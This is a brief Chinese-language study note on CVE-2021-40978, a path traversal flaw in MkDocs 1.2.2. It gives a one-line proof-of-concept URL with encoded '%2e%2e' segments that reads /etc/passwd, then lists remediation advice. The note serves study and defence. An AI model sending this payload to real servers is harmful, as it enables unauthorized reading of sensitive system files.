MKdocs 任意文件读取漏洞 CVE-2021-40978
漏洞描述:
MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件。
漏洞利用条件:
/
漏洞影响范围:
Mkdocs 1.2.2
漏洞复现:
1.poc:/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
修复建议:
1.严格检查变量是否已经初始化;
2.在服务器本地⽂件及远程⽂件,进⾏严格的检查,参数中不允许出现../之类的⽬录跳转符。
3.web服务器上通过授权管理机制来控制⽂件和资源的访问。
学习记录过程仅供参考!!!